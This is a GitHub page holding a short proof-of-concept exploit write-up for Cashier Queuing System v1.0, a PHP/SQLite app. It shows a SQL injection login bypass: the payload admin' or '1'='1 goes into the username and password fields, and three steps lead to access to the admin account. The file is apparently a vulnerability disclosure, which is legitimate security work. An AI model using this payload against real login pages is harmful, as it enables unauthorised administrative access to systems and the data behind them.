Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Exploit/SQLInj/POC
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
24 lines (18 sloc)
875 Bytes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Cashier Queuing System V1.0 - SQL Injection Leads to the admin account | |
| # Exploit Author: Kshitij Rewandkar | |
| # Vendor Name: oretnom23 | |
| # Vendor Homepage: https://www.sourcecodester.com/php/15047/cashier-queuing-system-live-monitor-and-voice-notification-php-and-sqlite-free-source | |
| # Software Link: https://www.sourcecodester.com/php/15047/cashier-queuing-system-live-monitor-and-voice-notification-php-and-sqlite-free-source | |
| # Version: v1.0 | |
| # Tested on: Windows 11, Apache | |
| Description: An SQL injection issue in Cashier Queuing System v.1.0 allows an attacker to log in to the admin account. | |
| Vulnerable Parameters: | |
| username | |
| password | |
| Payload: | |
| admin' or '1'='1 | |
| Steps: | |
| 1) Go to the Login page:- http://localhost/queuing/login.php | |
| 2) Now in username and password we put our payload | |
| Payload:- admin' or '1'='1 | |
| 3) Now when you click submit you get logged in |